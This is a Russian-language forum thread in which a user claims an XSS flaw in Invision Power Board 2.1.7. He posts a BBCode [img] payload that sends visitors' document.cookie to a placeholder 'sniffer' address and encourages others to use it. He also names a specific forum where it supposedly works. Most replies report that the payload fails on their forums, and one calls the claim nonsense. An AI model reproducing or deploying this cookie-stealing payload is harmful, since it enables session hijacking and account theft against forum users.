![]() |
Ура! Я вродь нашёл баг в Ipb 2.1.7
Короче роюсь я роюсь в своём форуме и нашёл баг-
Код:
[warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn]И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи! ================== Цитата:
|
"Динамические страницы в тэгах [img] запрещены"
Боюсь такой же ответ ждет на большинстве форумов. |
угу
|
Неа, не катит... А жаль.. =(
|
покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..
|
blackybr forum.angelz.ru ток чур неломать а то мне капут!
|
Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать :(
|
У меня не сработала...(
|
Наврядли у кого будет это работать. Почти ва всех форумах [img] запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +) |
Всё просто, но не везде идёт. я этим давно пользовался.
|
| Время: 17:52 |